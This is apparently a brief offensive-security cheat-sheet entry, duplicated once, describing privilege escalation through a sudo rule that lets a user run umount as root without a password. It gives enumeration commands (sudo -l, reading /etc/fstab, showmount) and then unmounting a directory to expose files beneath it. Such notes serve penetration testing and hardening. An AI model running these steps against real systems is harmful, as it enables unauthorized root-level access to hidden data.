Sudo Umount Privilege Escalation
Sudo umount is vulnerable to privilege escalation.
sudo -l
(root) NOPASSWD: /bin/umount
Copied!cat /etc/fstab
showmount -e localhost
Copied!sudo /bin/umount /opt/example
ls -al /opt/exampleLast updated

Sudo umount is vulnerable to privilege escalation.
sudo -l
(root) NOPASSWD: /bin/umount
Copied!cat /etc/fstab
showmount -e localhost
Copied!sudo /bin/umount /opt/example
ls -al /opt/exampleLast updated